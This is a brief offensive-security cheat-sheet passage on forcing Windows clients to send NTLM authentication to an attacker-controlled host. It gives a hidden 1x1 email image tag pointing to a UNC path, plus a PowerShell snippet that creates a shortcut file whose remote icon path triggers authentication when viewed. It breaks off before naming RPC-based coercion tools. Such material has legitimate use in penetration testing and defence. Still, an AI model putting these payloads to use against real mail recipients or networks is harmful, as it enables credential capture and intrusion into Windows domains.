To coerce NTLM authentication to a compromised host:

Email

Assuming access to an email inbox (e.g. Outlook), send the target client an email containing a 1x1 image (or modify sender’s signature to sneak it into legitimate emails):

<img src="\\$VULN_SRV_IP\test.ico" height="1" width="1" />

Shortcut file

Send the target client a shortcut file with an icon on a remote compromised host (UNC path). A authentication request to download the icon gets triggered whenever the file is shown in File Explorer (no click required).

$Wsh = new-object -ComObject wscript.shell
$Shortcut = $Wsh.CreateShortcut("test.lnk")
$Shortcut.IconLocation = "\\$VULN_SRV_IP\test.ico"
$Shortcut.Save()

Trigger Remote Authentication

Use certain tools to make computer accounts authenticate to a server (typically uses RPC protocols for printing and EFS) e.g.: